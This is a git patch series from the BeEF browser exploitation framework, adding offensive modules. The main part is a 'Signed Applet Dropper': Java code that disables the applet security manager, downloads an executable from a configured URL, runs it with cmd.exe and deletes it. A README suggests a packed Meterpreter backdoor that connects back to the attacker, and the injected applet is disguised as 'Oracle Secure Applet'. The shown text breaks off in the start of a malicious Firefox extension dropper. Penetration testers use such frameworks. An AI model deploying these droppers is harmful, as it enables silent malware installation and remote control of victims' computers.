+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html>
 <!--
     Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html>
 <head>
 	<title>BeEF Basic Demo</title>
 	<script>

From b280d099f835ea50fd2158d86d4868feb940d8e8 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 8 Oct 2013 17:02:02 +0100
Subject: [PATCH 382/397] From antisnatchor with love. New module: Signed Java
 Applet dropper (win only for now).

---
 .../signed_applet_dropper/README.txt          |  22 +++++
 .../signed_applet_dropper/applet/SM.class     | Bin 0 -> 276 bytes
 .../signed_applet_dropper/applet/SM.java      |  13 +++
 .../applet/SignedApplet.class                 | Bin 0 -> 2817 bytes
 .../applet/SignedApplet.jar                   | Bin 0 -> 3782 bytes
 .../applet/SignedApplet.java                  |  87 ++++++++++++++++++
 .../signed_applet_dropper/command.js          |  28 ++++++
 .../signed_applet_dropper/config.yaml         |  15 +++
 .../signed_applet_dropper/module.rb           |  30 ++++++
 9 files changed, 195 insertions(+)
 create mode 100644 modules/exploits/local_host/signed_applet_dropper/README.txt
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SM.class
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SM.java
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/command.js
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/config.yaml
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/module.rb

diff --git a/modules/exploits/local_host/signed_applet_dropper/README.txt b/modules/exploits/local_host/signed_applet_dropper/README.txt
new file mode 100644
index 000000000..3148891d4
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/README.txt
@@ -0,0 +1,22 @@
+--- How to use this module ---
+-- antisnatchor:
+ - the applet has been compiled with Java 1.6.0 update 0 in order to be compatible with every JRE > 1.6.x (1.7.x included)
+ - tested with IE8 on XP SP3, and IE10 on Win7
+ - tested with JRE 1.6.x and 1.7.x
+
+ - I advise you to recompile/re-sign the applet yourself, the following are the required steps to compile and self-sign the applet.
+NOTE: Best results are obtained signing the applet with a valid Code Signing certificate.
+
+ - Ideally the dropper is a packed backdoor (Meterpreter?) that connects back to your server (for instance a Metasploit multi/handler).
+
+1. compile the two classes
+javac SignedApplet.java SM.java
+
+2. create a JAR
+jar cvf SignedApplet.jar SignedApplet.class SM.class
+
+3. generate a keystore to self-sign the applet
+keytool -keystore tmp -genkey
+
+4. sign the applet
+jarsigner -keystore tmp signedAppletCmdExec.jar mykey
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.class b/modules/exploits/local_host/signed_applet_dropper/applet/SM.class
new file mode 100755
index 0000000000000000000000000000000000000000..e5e180b79d9ca74153b71df78bfc8c830df341ec
GIT binary patch
literal 276
zcmZ9G!D_-l5QhIrOj1*;XAd5FOM7UbSH+9q$&^CG`<gDgt!`jr1Ru+j(1Q=)Ly0p%
zD0E=|*_rv~XD-*@Gk|yWV)*Dpc#6;^gd=0kZcOl#mj$6UDZezKH#1g$)Z3+YbG6(^
zr&#Oa=Tp0_sVY-i!XTM_tG!AqUDVF(4(Z=;C{}S^)~?V~BkNI~y$Rhx3jx8)GeW;v
z-zd9E^Sei;tXgS@XLx+1ga<wf0c*(BfHQFpUQeJSf7qEdY?^{Tpv@|1pPwhhe@wjM
HX83pmVQDiz

literal 0
HcmV?d00001

diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.java b/modules/exploits/local_host/signed_applet_dropper/applet/SM.java
new file mode 100755
index 000000000..14d38bb9d
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SM.java
@@ -0,0 +1,13 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.security.*;
+public class SM extends SecurityManager {
+    @Override
+    public void checkPermission(Permission perm) {
+        return;
+    }
+}
\ No newline at end of file
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class
new file mode 100755
index 0000000000000000000000000000000000000000..bc6ef79b5f542da141616e207ecdd506e9dec3b1
GIT binary patch
literal 2817
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
L_jdDM6|VUYR<oY_

literal 0
HcmV?d00001

diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar
new file mode 100755
index 0000000000000000000000000000000000000000..ee54b1118a9d4c71c73fd3f90489b8d9a93057f6
GIT binary patch
literal 3782
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

literal 0
HcmV?d00001

diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
new file mode 100755
index 000000000..697f5d59b
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
@@ -0,0 +1,87 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.applet.*;
+import java.awt.*;
+import java.io.*;
+import java.util.*;
+import java.net.URL;
+
+public class SignedApplet extends Applet {
+
+    public static String debug = "false";
+    public static String bin_url = "";
+    public static String bin_path = "";
+    public static boolean download = false;
+
+    public void init(){
+        bin_url = (String)getParameter("url");
+        String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);
+        bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";
+
+        // grab operating system -> not used atm
+        // TODO: make the applet compatible also with Linux/OSX
+        String os = System.getProperty("os.name").toLowerCase();
+        execute();
+    }
+
+    public SignedApplet(){
+        super();
+        SecurityManager sm = new SM();
+        System.setSecurityManager(sm);
+        return;
+    }
+
+    public static boolean download(){
+        boolean success = false;
+        try{
+            URL url = new URL(bin_url);
+            InputStream is = url.openStream();
+            BufferedInputStream isbuf = new BufferedInputStream(is);
+            File bin_out = new File(bin_path);
+            OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));
+            byte[] buf = new byte[1024];
+            for (;;){
+                int bs = isbuf.read(buf);
+                if (bs <= 0) break;
+                out.write(buf, 0, bs);
+            }
+            out.flush();
+            out.close();
+            is.close();
+            success = true;
+            return success;
+        }catch(Exception e){
+            return success;
+        }
+    }
+
+    public static String execute() {
+        String result = "";
+        String command = "";
+        try{
+            boolean downloadOk = download();
+            System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");
+            result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";
+
+            if(downloadOk){
+                // TODO: make the applet compatible also with Linux/OSX
+                command = "cmd.exe /c \"" + bin_path + "\"";
+                Process p = Runtime.getRuntime().exec(command);
+                p.waitFor();
+                /// delete dropped binary
+                new File(bin_path).delete();
+                result += "\n\nExecution OK.";
+            }else{
+                //downloading of dropper failed, catch error..
+                result = "Download error.";
+            }
+        }catch (Exception e) {
+            result = "Exception!!!: \n";
+        }
+        return result;
+    }
+}
diff --git a/modules/exploits/local_host/signed_applet_dropper/command.js b/modules/exploits/local_host/signed_applet_dropper/command.js
new file mode 100755
index 000000000..3cd74f3b0
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/applet/SignedApplet.jar';
+    var applet_name = '<%= @applet_name %>';
+    var dropper_url = '<%= @dropper_url %>';
+    var ie_only = '<%= @ie_only %>';
+
+    function attach(){
+       beef.dom.attachApplet('signed_applet', applet_name, 'SignedApplet.class',
+         null, applet_archive, [{'url':dropper_url}]);
+
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet added to the DOM.');
+    }
+
+    if(ie_only == "on"){
+       if(beef.browser.isIE()){
+         attach();
+       }
+    }else{
+       attach();
+    }
+});
diff --git a/modules/exploits/local_host/signed_applet_dropper/config.yaml b/modules/exploits/local_host/signed_applet_dropper/config.yaml
new file mode 100755
index 000000000..4110ef9ec
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        signed_applet_dropper:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Signed Applet Dropper"
+            description: "Injects a Signed Java Applet (compiled with Java 1.6.0 in order to be compatible with every JRE from 1.6.0 to latest 1.7) that downloads a dropper and executes it.<br />Currently works only on Windows.<br /><br />Internet Explorer is the only browser that doesn't implement Click to Play for plugins, that's what the IE only checkbox is meant for."
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["All"]
diff --git a/modules/exploits/local_host/signed_applet_dropper/module.rb b/modules/exploits/local_host/signed_applet_dropper/module.rb
new file mode 100755
index 000000000..1cc350aa5
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Signed_applet_dropper < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class')
+
+  end
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+        {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
+        {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},
+        {'name' => 'ie_only', 'ui_label' => 'Internet Explorer only?', 'type' => 'checkbox', 'checked' => 'checked' },
+
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end

From 45c51180a65a6cf26691d0c7ab8fbcb0007dee08 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 9 Oct 2013 16:11:27 +0100
Subject: [PATCH 383/397] Completely removed deployJava ro prevent CtP issues
 on Firefox.

---
 core/main/handlers/modules/beefjs.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index a9045b4f3..2bb2dfeec 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js lib/deployJava.js)
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)

From 5dd46ffd7274f5eeb67c633b4556649f8c07636a Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 10 Oct 2013 15:18:03 +0100
Subject: [PATCH 384/397] From antisnatchor with love. New module: malicious
 Firefox Extension dropper. Based on @mihi42 FF extension.

---
 .../firefox_extension_dropper/command.js      | 39 ++++++++
 .../firefox_extension_dropper/config.yaml     | 16 ++++
 .../dropper/readme.txt                        |  2 +
 .../extension/bootstrap.js                    | 30 ++++++
 .../extension/chrome.manifest                 |  2 +
 .../extension/install.rdf                     | 24 +++++
 .../extension/overlay.xul                     |  5 +
 .../firefox_extension_dropper/module.rb       | 92 +++++++++++++++++++
 8 files changed, 210 insertions(+)
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/command.js
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/config.yaml
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul
 create mode 100644 modules/exploits/local_host/firefox_extension_dropper/module.rb

diff --git a/modules/exploits/local_host/firefox_extension_dropper/command.js b/modules/exploits/local_host/firefox_extension_dropper/command.js
new file mode 100644
index 000000000..4dae24103
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/command.js
@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var xpi_name = '<%= @xpi_name %>';
+    var domain = '<%= @domain %>';
+    var ff_extension = '/' + xpi_name + '.xpi';
+
+    if(beef.browser.isFF()){
+        var id = beef.dom.generateID();
+        var pid = beef.dom.generateID();
+        var zztop = beef.dom.getHighestZindex()+1;
+        var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+        var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAEJGlDQ1BJQ0MgUHJvZmlsZQAAOBGFVd9v21QUPolvUqQWPyBYR4eKxa9VU1u5GxqtxgZJk6XtShal6dgqJOQ6N4mpGwfb6baqT3uBNwb8AUDZAw9IPCENBmJ72fbAtElThyqqSUh76MQPISbtBVXhu3ZiJ1PEXPX6yznfOec7517bRD1fabWaGVWIlquunc8klZOnFpSeTYrSs9RLA9Sr6U4tkcvNEi7BFffO6+EdigjL7ZHu/k72I796i9zRiSJPwG4VHX0Z+AxRzNRrtksUvwf7+Gm3BtzzHPDTNgQCqwKXfZwSeNHHJz1OIT8JjtAq6xWtCLwGPLzYZi+3YV8DGMiT4VVuG7oiZpGzrZJhcs/hL49xtzH/Dy6bdfTsXYNY+5yluWO4D4neK/ZUvok/17X0HPBLsF+vuUlhfwX4j/rSfAJ4H1H0qZJ9dN7nR19frRTeBt4Fe9FwpwtN+2p1MXscGLHR9SXrmMgjONd1ZxKzpBeA71b4tNhj6JGoyFNp4GHgwUp9qplfmnFW5oTdy7NamcwCI49kv6fN5IAHgD+0rbyoBc3SOjczohbyS1drbq6pQdqumllRC/0ymTtej8gpbbuVwpQfyw66dqEZyxZKxtHpJn+tZnpnEdrYBbueF9qQn93S7HQGGHnYP7w6L+YGHNtd1FJitqPAR+hERCNOFi1i1alKO6RQnjKUxL1GNjwlMsiEhcPLYTEiT9ISbN15OY/jx4SMshe9LaJRpTvHr3C/ybFYP1PZAfwfYrPsMBtnE6SwN9ib7AhLwTrBDgUKcm06FSrTfSj187xPdVQWOk5Q8vxAfSiIUc7Z7xr6zY/+hpqwSyv0I0/QMTRb7RMgBxNodTfSPqdraz/sDjzKBrv4zu2+a2t0/HHzjd